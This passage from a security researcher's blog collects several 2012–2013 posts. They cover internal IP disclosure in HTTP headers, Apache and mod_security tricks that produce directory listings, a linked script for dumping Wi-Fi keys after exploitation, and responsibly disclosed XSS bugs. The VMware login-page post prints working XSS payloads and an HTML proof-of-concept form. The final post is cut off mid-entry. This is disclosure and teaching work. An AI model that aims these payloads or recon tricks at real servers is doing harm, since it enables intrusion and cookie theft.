<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnKEWBclJe2C3mdQ7pcbRwyWCIdMCkWgCLrRkJc3HX1zTckIL8ZUuYfix3XAc45L7b1SSY2nl_CymdgIEBPGAVuYzMMZccmmMbCsymsOztYeojxp5KMLpgWSDeGJapewQAWCFPQQ/s1600/bipip.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnKEWBclJe2C3mdQ7pcbRwyWCIdMCkWgCLrRkJc3HX1zTckIL8ZUuYfix3XAc45L7b1SSY2nl_CymdgIEBPGAVuYzMMZccmmMbCsymsOztYeojxp5KMLpgWSDeGJapewQAWCFPQQ/s640/bipip.png" width="640" /></a></div>
<br />
<br />
These are the some of the HTTP headers over which internal IP is exposed. While deployment, one should verify and validate that these headers should not expose unnecessary information.<br />
<br />
Note: If anyone has additional information regarding Internal IP address disclosure over HTTP channel, let me know and I will update this entry. The idea is to collect all the metrics.<br />
<br />
Enjoy!<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com5tag:blogger.com,1999:blog-30098758.post-51639793541300676662013-05-20T04:01:00.000-07:002013-05-20T04:01:12.585-07:00Contrarisk Security Podcast Series: A Talk on Socioware!<div class="separator" style="clear: both; text-align: center;">
<a href="http://theplayvault.com/wp/wp-content/uploads/2011/06/podcast1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://theplayvault.com/wp/wp-content/uploads/2011/06/podcast1.png" width="200" /></a></div>
<br />
I recently did a podcast on the Socioware with Steve from Contrarisk.<br />
<br />
"Microsoft recently warned about Man in the Browser (MitB) malware exploiting Facebook sessions. When a user is infected – often by drive-by downloads on infected or malicious sites – the malware uses authenticated sessions on Facebook to post messages, ‘like’ pages and get up to general mischief."<br />
<br />
Listen to the podcast here: <a href="http://contrarisk.com/2013/05/19/csp-0011/"><b>http://contrarisk.com/2013/05/19/csp-0011/</b></a><br />
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-53071374101382266732013-05-04T19:55:00.001-07:002013-05-04T19:55:56.029-07:00ToorCon 14 (2012) : Malandroid - The Crux of Android InfectionsTalk that I gave on Android malware at Toorcon 14.<br />
<br />
<div style="text-align: center;">
<center>
</center>
</div>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/NrIA4V7U1aI" width="420"></iframe></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/t-AVgW0K4tQ" width="420"></iframe></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
</div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com1tag:blogger.com,1999:blog-30098758.post-6572872336902349242013-04-27T11:34:00.000-07:002013-04-27T11:34:46.435-07:00(Pentest Apache #3) - The Nature of # (%23) Character | Mod Security Rules in Apache<div class="separator" style="clear: both; text-align: center;">
<br /></div>
In my earlier posts, I have talked about some interesting issues in deployed modules in Apache and insecure configuration. Refer here:<br />
<br />
<b>1. <a href="http://zeroknock.blogspot.com/2012/10/exposed-apache-axis-soap-objects.html">(Pentest Apache #1) Exposed Apache Axis - SOAP Objects</a></b><br />
<b>2. <a href="http://zeroknock.blogspot.com/2013/01/pentest-apache-2-beauty-of-3f-and.html">(Pentest Apache #2) - The Beauty of "%3F" and Apache's Inability | Wordpress | Mod Security</a></b><br />
<br />
In this post, I want to discuss an interesting issue that occurs due to misconfigured rules in modsecurity. It is not a severe issue but it helps the penetration tester to gain some additional information about the server-side environment. For example:- directory listing.<br />
<br />
In modsecurity, NE is stated as No Escape. One can explicitly configure the rules with this flag to implement no escaping. For example: <b>"#"</b> will be converted to <b>"%23"</b> if NE flag is not set. If NE flag is set , the <b>"#" </b>character is treated as such and processed accordingly. For more about modsecurity flags, refer here: <a href="http://httpd.apache.org/docs/2.2/rewrite/flags.html"><b>http://httpd.apache.org/docs/2.2/rewrite/flags.html</b></a>. An example taken from there:<br />
<br />
<br />
<i><b>"RewriteRule ^/anchor/(.+) /bigpage.html#$1 [NE,R]. </b><b>This example will redirect /anchor/xyz to /bigpage.html#xyz."</b></i><br />
<br />
If escaping is not set properly in addition to some misconfiguration issue, it could result in unexpected behavior. I have noticed this flaw plethora of times during a number of security assessments. Let's have a look at one of the real time example:-<br />
<br />
<br />
URL pattern 1: <b>http://www.example.com/temp/#htaccess.cl</b><br />
URL pattern 2: <b>http://www.example.com/temp/%23htaccess.cl</b><br />
<b><br /></b>
In case (1), if NE flag is set, the URL has to be processed with <b>"#"</b> character. In case (2), if NE flag is not set, the URL has to be processed with <b>"%23"</b>, hexadecimal notation of the character <b>"#"</b>. But due to misconfiguration, the behavior changes.<br />
<br />
The tested server is : <b>Apache/2.2.14. </b>Actually, both URLs are responded with 200 OK responses. In case (1), the output results in directory listing. In case (2), the output results in content of the file htaccess.cl.<br />
<br />
<b>Case 1: Content-Type is text/html;charset=UTF-8</b><br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQX_KjkJJEz5PHI4t4QOABuO6pNRd_m5_c-aUlwifRmU3DTiZUtkVpzcofupq24XC60DzLh3RYNdlfLt2bD6fygKC9E0vI_kSrFst3nqvJaA_WZ9TwZUTMqkOaRBarnSi5oYfAsw/s1600/mod_security_case_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQX_KjkJJEz5PHI4t4QOABuO6pNRd_m5_c-aUlwifRmU3DTiZUtkVpzcofupq24XC60DzLh3RYNdlfLt2bD6fygKC9E0vI_kSrFst3nqvJaA_WZ9TwZUTMqkOaRBarnSi5oYfAsw/s400/mod_security_case_1.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>With # Character </b></td></tr>
</tbody></table>
<b>Case 2: Content-Type is text/plain</b><br />
<div>
<b><br /></b>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnJwT8QfQURhHCzI5uqW1C03nfzO-9NmUyM6cIuwzXiS8CkmGOHYLIXqYX8woUTFgEYvCbfrNTfHUoqb5ZH-mdqn5tpPjeMRWsZgWvIXq5kQam8nNmLtnR7UXBXo0oXKu8sRXaSg/s1600/mod_security_case_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnJwT8QfQURhHCzI5uqW1C03nfzO-9NmUyM6cIuwzXiS8CkmGOHYLIXqYX8woUTFgEYvCbfrNTfHUoqb5ZH-mdqn5tpPjeMRWsZgWvIXq5kQam8nNmLtnR7UXBXo0oXKu8sRXaSg/s400/mod_security_case_2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br />
<b>With %23 Character</b></td></tr>
</tbody></table>
<br />
It could be a one reason that file name starts with "#" character. But, the primary reason is the inability of Apache to understand misconfigured URL rewriting rules. Usually, if the URL rewriting rule fails, the web server should respond in 404 error message. In case of misconfiguration, the fall back step is the directory listing, atleast that what I have seen in practical scenarios (it could be different).<br />
<br />
<b>Inference: </b>Play around with URL rewriting rules to detect bypasses which could result in gleaning additional information.<br />
<br /></div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com1tag:blogger.com,1999:blog-30098758.post-61582528237720424182013-04-09T22:31:00.001-07:002013-05-05T19:50:15.365-07:00A Sweet Script to Dump Keys from Wlan Profiles - Post Exploitation (or Regular Use)<b>Update: </b>Just found that PaulDotCom has written over this blog post in episode 327: <b><a href="http://pauldotcom.com/wiki/index.php/Episode327">http://pauldotcom.com/wiki/index.php/Episode327</a>.</b><br />
<b><br /></b>
<i>"This is a great example of so many things. First, its a really neat little script (though I imagine the powershell junkies will be excited to convert it). It highlights the importance of post-exploitation. But that is really just a term for us gear heads. What this means for the organization is terrible. It means you can exploit systems that really don't seem to matter, maybe Jane's computer was compromised and didn't have any sensitive data on it and her account does not. However, Jane connects to the same "secure" wireless network as more important people, say Bob from finance. Now, a small little hole, like a missing Adobe patch, just caughed up the keys to your kingdom. It means that vulnerabilities and risk have this weird relationship and its one of the toughest things to understand, until you have a pen test."</i><br />
<br />
After exploitation, retrieving data from the compromised machine is always an interesting scenario. Considering the time factor, even a small automation is productive. Running a same command several times is not bad but its better to take a next step.<br />
<br />
The below presented script helps to dump security keys for all the wlan profiles present on the compromised system (if you have an administrator access). I use this sweet script to do the work so use it when ever you want.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUiizZ02w88-UQIgRZql4I9iK89tHXk8n6ygblFAqUTYReR2m7HpMktgHTBRqtSo-rlmzhrvTiemYQMXX7hu9oQXHJrYLzcbPtoV7zWi1Ufv-XNRqhBfICbhm6eRK1ZPmE0a-65A/s1600/dump_wlan_keys.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUiizZ02w88-UQIgRZql4I9iK89tHXk8n6ygblFAqUTYReR2m7HpMktgHTBRqtSo-rlmzhrvTiemYQMXX7hu9oQXHJrYLzcbPtoV7zWi1Ufv-XNRqhBfICbhm6eRK1ZPmE0a-65A/s640/dump_wlan_keys.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Wlan Profiles - Security Keys Dumping Script<br />
<br />
<div style="text-align: left;">
<span style="font-size: small;">It outputs as:</span></div>
<div style="text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisMjQC3if5oqzBaStdYA_-4zQ6OXwxUVnRFfF25Y82TIJRYLkam3s0BohVBxCdIOD1FDbHAz0kpl45TQdnvOSrRteHlKUOiFet_vrakDbZcW-_f5_ftEVsDq_zZOKPNiekaZd9YQ/s1600/output_wlan_dump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="416" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisMjQC3if5oqzBaStdYA_-4zQ6OXwxUVnRFfF25Y82TIJRYLkam3s0BohVBxCdIOD1FDbHAz0kpl45TQdnvOSrRteHlKUOiFet_vrakDbZcW-_f5_ftEVsDq_zZOKPNiekaZd9YQ/s640/output_wlan_dump.png" width="640" /></a></div>
<div style="text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-size: small;">Fetch the batch script from here: <a href="http://www.secniche.org/tools/dump_wlan_config.txt"><b>http://www.secniche.org/tools/dump_wlan_config.txt</b></a></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-size: small;">Enjoy </span>!</div>
</td></tr>
</tbody></table>
<br /><div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com1tag:blogger.com,1999:blog-30098758.post-49985382088643834372013-03-26T20:48:00.001-07:002013-03-26T20:48:51.390-07:00Responsible Disclosure : XSS in Damballa Reported and Patched !Last weekend, I was reading some research papers available at Damballa website which are awesome without any doubt. I was surfing the website and to surprise, I found an XSS vulnerability in the website. Since, the Damballa provides anti malware solutions, XSS can be used for malicious purposes. Under responsible disclosure constraints, I contacted David Holmes of Damballa and revealed the issue. What makes a responsible disclosure interesting is the prompt reply from the vendor who is willing to patch the vulnerability without any complexities. The same happened with Damballa. They patched the bug right away. In addition, I had a good discussions with David Holmes why the issue persisted in the website.<br />
<br />
I expect that every vendor should be prompt enough to patch the issue.<br />
<br />
Proof-of-Concept (PoC):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj4lwVhFR8k516ntMMSueMJNnL9ru5FGlUeRkgk58Xftc99d5zXOjjjwRkg8QIlNIRCU3lIZOKF4OUJiDU1KfFUzhXQZLP7xVm8MYgmrcetSCckBSgV5k-z9-TD-La-PzIWXLuYg/s1600/damballa_xss_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="355" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj4lwVhFR8k516ntMMSueMJNnL9ru5FGlUeRkgk58Xftc99d5zXOjjjwRkg8QIlNIRCU3lIZOKF4OUJiDU1KfFUzhXQZLP7xVm8MYgmrcetSCckBSgV5k-z9-TD-La-PzIWXLuYg/s640/damballa_xss_1.png" width="640" /></a></div>
<br />
Be responsible in disclosing bugs.<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-68564220625741997952013-01-27T07:20:00.000-08:002013-01-27T21:21:20.798-08:00VMware Management Interface - A Little Story of XSS<div style="text-align: left;">
As a part of my open research, I came across an XSS vulnerability in VMware management interface which is used by VMware ESX and GSX server. I thought it might be a new issue but interestingly a number of XSS issues have already been reported to VMware security team. The list can be found here: <a href="http://www.cvedetails.com/vulnerability-list/vendor_id-252/opxss-1/Vmware.html">http://www.cvedetails.com/vulnerability-list/vendor_id-252/opxss-1/Vmware.html</a></div>
<div>
<div style="text-align: left;">
<br /></div>
</div>
<div class="separator" style="clear: both; text-align: left;">
On the other note, a number of VMware management interfaces exposed on the Internet are still vulnerable. Of-course, the administrators have not deployed patches or upgraded the required software. I din't get enough details on the XSS issue (may be I missed it). So, I thought to talk about the issue in detail here. I am not going to list which versions are affected, you can get that information in the advisories. I will talk about the issue. The management interface look like as presented below:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbgtjYpuwlVRqLA9VrpLdx3L8koHJiplu1qz8u-VC1ZhTTu4UD_OOVDVYiSxZzx6Ul_IUvLqguXkQVyJXqJ_OAuSzFNLVQzmcWJBiUN6h0_GodBMZgbBdmNfNGCJDG5MnmGXEzAg/s1600/vmware_man_interface_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbgtjYpuwlVRqLA9VrpLdx3L8koHJiplu1qz8u-VC1ZhTTu4UD_OOVDVYiSxZzx6Ul_IUvLqguXkQVyJXqJ_OAuSzFNLVQzmcWJBiUN6h0_GodBMZgbBdmNfNGCJDG5MnmGXEzAg/s640/vmware_man_interface_1.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>VMware Management Interface</b></td></tr>
</tbody></table>
<div>
The username and password field are provided with ids as "l" and "m" respectively. Interestingly, the vulnerable interfaces use client side encoding to obfuscate the input values entered by the user. But, this can be taken care while using proxy, the value can be directly passed without encoding (alter the HTTP request and POST parameters in the proxy such as BURP, Charles, etc). For example:- if you specify the parameters as follows:<br />
<br />
<b><i>l="/>"/>"/><script>alert(document.cookie);</script></i></b><br />
<b><i>m=test</i></b><br />
<br />
it gets encoded as follows:<br />
<br />
<b><i>l = Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==</i></b><br />
<b><i>m = dGVzdA==</i></b><br />
<b><br /></b>
Well, its not a complex encoding but only a Base 64 encoding. Even if, one uses the proxy to pass the values without encoding, due to client side work, the XSS payload fails to render in the webpage. The output looks like as follows:<br />
<br />
<br />
<i><html><head><title>Login: VMware Management Interface</title><script> var <b>user="Ii8+Ii8+Ii8+PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;</b></i><br />
<i><b></script></head><body bgcolor="#336699" </b>onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html></i><br />
<br />
<br />
It reflects back our XSS payload but in Base 64 encoded format which is rendered as useless data. The vulnerability persisted in the handling of these parameters on the server side. If you check, the same payload is reflected back without any additional modification. Actually, the server does not perform any encoding or input validation. Its all client side. <b>The idea is to simply render this payload without encoding.</b> All the POST requests are handled by the<b><i> /sx-login/index.pl</i></b>. Let's see:<br />
<b><br /></b>
<i><b>(Request-Line)<span class="Apple-tab-span" style="white-space: pre;"> </span>POST /sx-login/index.pl HTTP/1.1</b></i><br />
<i><b>Host: <vulnerable_host_ip></vulnerable_host_ip></b></i><br />
<br />
<i>User-Agent:<span class="Apple-tab-span" style="white-space: pre;"> </span>Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0</i><br />
<i>Accept:<span class="Apple-tab-span" style="white-space: pre;"> </span>text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</i><br />
<i>Accept-Language:<span class="Apple-tab-span" style="white-space: pre;"> </span>en-US,en;q=0.5</i><br />
<i>Accept-Encoding:<span class="Apple-tab-span" style="white-space: pre;"> </span>gzip, deflate</i><br />
<i>Referer:<span class="Apple-tab-span" style="white-space: pre;"> </span>https://82.133.251.1/vmware/en/login.html</i><br />
<i>Cookie:<span class="Apple-tab-span" style="white-space: pre;"> </span>vmware.mui.test=1; vmware.mui.test=1</i><br />
<i>Connection:<span class="Apple-tab-span" style="white-space: pre;"> </span>keep-alive</i><br />
<i>Content-Type:<span class="Apple-tab-span" style="white-space: pre;"> </span>application/x-www-form-urlencoded</i><br />
<i>Content-Length:<span class="Apple-tab-span" style="white-space: pre;"> </span>95</i><br />
<br />
<br />
The simple proof of concept (PoC) that directly sends request to the /sx/login/index.pl is shown below which queries directly without any encoding and made the XSS work.<br />
<br />
<br />
<i><html></i><br />
<i><body></i><br />
<i><br /></i>
<i><b><form name="k" id="k" method="post" action="https://example.com/sx-login/index.pl" target="data"></b></i><br />
<i><b><input name="l" type="text" value='"--></style></script><script>alert(document.location);</script>"'/></b></i><br />
<i><b><input name="m" type="password" value="test"/></b></i><br />
<i><b><input type="submit" value="Submit"></b></i><br />
<i></form></i><br />
<i><br /></i>
<i></body></i><br />
<i></html></i><br />
<b><i><br /></i></b>
Once this form is successfully submitted, it results in XSS as shown below:<br />
<br />
<br />
<i><html><head><title>Login: VMware Management Interface</title><script></i><br />
<i><b>var user=""--></style></script><script>alert(document.location);</script>"";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;</b></i><br />
<i><b></script></head><body bgcolor="#336699" </b>onload="try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}"></body></html></i><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsDy7ic8scSpqZKjtlqpUfDWC3HBVrk_LndWmzGFsvvwaHgXOKUb98-7B51uJ19RHHls8CQ3mo0_7K1ymJHkXxW2Ost4-DQ20UY49Z4HvWfWfqy0kX0XOeGgQmq3SuLBDXmBsAnA/s1600/vmware_man_interface_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsDy7ic8scSpqZKjtlqpUfDWC3HBVrk_LndWmzGFsvvwaHgXOKUb98-7B51uJ19RHHls8CQ3mo0_7K1ymJHkXxW2Ost4-DQ20UY49Z4HvWfWfqy0kX0XOeGgQmq3SuLBDXmBsAnA/s640/vmware_man_interface_2.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Successful XSS Injection</b></td></tr>
</tbody></table>
On patched systems, the web server replied back as follows:<br />
<br />
<i><span class="error" title="Start tag seen without seeing a doctype first. Expected “<!DOCTYPE html>”."><<span class="start-tag">html</span>></span><<span class="start-tag">head</span>><<span class="start-tag">title</span>>Login: VMware Management Interface</<span class="end-tag">title</span>><<span class="start-tag">script</span>></i><br />
<pre id="line1"><i><span id="line2"></span><b>var user="\"--\u003E\u003C/style\u003E\u003C/script\u003E\u003Cscript\u003Ealert(document.location);\u003C/script\u003E\"";var err="-4";var str="Permission denied: Login (username/password) incorrect";var next=null;</b>
<span id="line3"></span></<span class="end-tag">script</span>></<span class="end-tag">head</span>><<span class="start-tag">body</span> <span class="attribute-name">bgcolor</span>="<a class="attribute-value" href="http://www.blogger.com/blogger.g?blogID=30098758">#336699</a>" <span class="attribute-name">onload</span>="<a class="attribute-value" href="http://www.blogger.com/blogger.g?blogID=30098758">try{if(parent.loginCb)parent.loginCb(self);}catch(e){;}</a>"></<span class="end-tag">body</span>></<span class="end-tag">html</span>></i></pre>
<br />
The patched versions are now using server side unicode encoding to subvert the XSS payload.<br />
<br />
Enjoy!</div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-48265032581633195652013-01-24T11:36:00.003-08:002013-01-27T21:22:04.452-08:00Responsible Disclosure : XSS in UBMLast year, I reported an XSS issue in the <a href="http://ubminformation.com/">ubminformation.com</a> which was used by UBM organization. I revealed the details to Trey Ford, and the result is as expected. The issue has been patched :). The domain is no longer valid as it redirects all the traffic to the primary website <a href="http://ubm.com/">ubm.com</a>.<br />
<br />
This issue was result of an outcome of open research. The good point is that, the vulnerability got noticed and patched.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgusYt0kvTNUXOM_V1vLF2VLH0baSxvFnr9pGD2P6_IcCNu0wTajb44Gu7g7EKd8Lw1Jxg6iFPie0Zbn7N8GCKWspQRdoi-YA8BHBclZGypPtfIovp5eyfS5nAKINdcEhmVRVEauA/s1600/ubm_xss_1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgusYt0kvTNUXOM_V1vLF2VLH0baSxvFnr9pGD2P6_IcCNu0wTajb44Gu7g7EKd8Lw1Jxg6iFPie0Zbn7N8GCKWspQRdoi-YA8BHBclZGypPtfIovp5eyfS5nAKINdcEhmVRVEauA/s640/ubm_xss_1.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">XSS - 1 </td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
and ...</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ2AOAxW-fvPlvXTzYVn0A97csQHQ164t3i3d9UpFTQImj9MptGHZQN_BmYYdCL3ZvVeHcky3dB4H4mMh_FXi5u6DtKY3ZwemRKQagGdCXGGSdeYNl6Lin0AUJ9JDgEkEqOrRaxQ/s1600/ubm_xss_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ2AOAxW-fvPlvXTzYVn0A97csQHQ164t3i3d9UpFTQImj9MptGHZQN_BmYYdCL3ZvVeHcky3dB4H4mMh_FXi5u6DtKY3ZwemRKQagGdCXGGSdeYNl6Lin0AUJ9JDgEkEqOrRaxQ/s640/ubm_xss_2.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">XSS - 2</td></tr>
</tbody></table>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-20267419678820499762013-01-20T16:36:00.003-08:002013-01-27T21:22:43.886-08:00(Pentest Apache #2) - The Beauty of "%3F" and Apache's Inability | Wordpress | Mod Security<b>Tested Apache Version: Apache 1.3.37(Unix) (with different modules)</b><br />
<div>
<div>
<br /></div>
<div>
I was doing an open research and came across an interesting issue which helps a penetration tester to gather more information about the files present (directory listing) on the web server (specific web folder). I tested only one version of Apache for this. Let's understand this issue. The problem is present in Apache's ability to process the encoded value of <b>"?"</b> which is <b>"%3F". </b></div>
<div>
<br /></div>
<div>
<b>Testing:</b> During the validation, I found that wordpress was running on Apache 1.3.37(unix). Due to misconfiguration, it was possible to access the <b>/wp-includes/ </b>folder, which resulted in directory listing as shown below:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzsQgqnDVVRJTgaiOV95HZ9olxwTNXqBHJDK2bV7ohaP94t386yAzkwj2k5gWsEymcxn7kvOF8lIv8_yzYw8TIzvQ0OW8trVzjk56J2hMFwbJ3L38V2jVDaHhO851DxZuafbku3A/s1600/apache_2_wordpress_dir_listing_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="427" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzsQgqnDVVRJTgaiOV95HZ9olxwTNXqBHJDK2bV7ohaP94t386yAzkwj2k5gWsEymcxn7kvOF8lIv8_yzYw8TIzvQ0OW8trVzjk56J2hMFwbJ3L38V2jVDaHhO851DxZuafbku3A/s640/apache_2_wordpress_dir_listing_1.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
So, when I accessed the <b>/wp-admin/ </b>directory, it redirected me to the login page as presented below:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6HQmP-pAVN9f9q_oCDMrcweRqJYvVGFwijtKurJ1_BXUEz-4iZIffk7cs3RRTdagMw74-xrkqgQGD3YzjN5N7gq1miJwwQro3C-sjH6l-CSFhm-MWGKnL-Q7ABKOg9S3YWlG7HQ/s1600/apache_2_wordpress_dir_listing_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="409" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6HQmP-pAVN9f9q_oCDMrcweRqJYvVGFwijtKurJ1_BXUEz-4iZIffk7cs3RRTdagMw74-xrkqgQGD3YzjN5N7gq1miJwwQro3C-sjH6l-CSFhm-MWGKnL-Q7ABKOg9S3YWlG7HQ/s640/apache_2_wordpress_dir_listing_2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
Tthe above presented screenshot shows the correct behavior of the wordpress or the Apache server when /wp-admin/ directory is accessed. Now, when I accessed the <b><a href="http://www.example.com/blog/">http://www.example.com/blog/</a></b> , the web server displayed the contents of wordpress blog such as posts and entries. </div>
<div>
<br /></div>
<div>
<b>Question :</b> Is it possible to get the directory listing on accessing the <b>/blog/ directory?</b></div>
<div>
<b>Answer :</b> Yes, It can be done in some web servers such as Apache.</div>
<div>
<br /></div>
<div>
<b>Question :</b> How can it be possible?</div>
<div>
<b>Answer : </b>I exploited the behavior of Apache in processing the encoded <b>"?"</b> character whose value is</div>
<div>
<b>"%3F"</b>. Amazingly, it worked. I constructed the payload as: <b><a href="http://www.example.com/blog/%3Fpage_id=34">http://www.example.com/blog/%3Fpage_id=34</a>. [One can use any id number or parameter]</b></div>
<div>
<b><br /></b></div>
<div>
<b>Other examples:</b></div>
<div>
<b><a href="http://www.example.com/blog/%3Fpage_id=34">http://www.example.com/blog/%3Fp_id=34</a></b></div>
<div>
<b><a href="http://www.example.com/blog/%3Fpage_id=34">http://www.example.com/blog/%3Fpg_id=34</a></b></div>
<div>
<b><br /></b></div>
<div>
When I used the above stated payload, I got the response as follows:</div>
<div>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
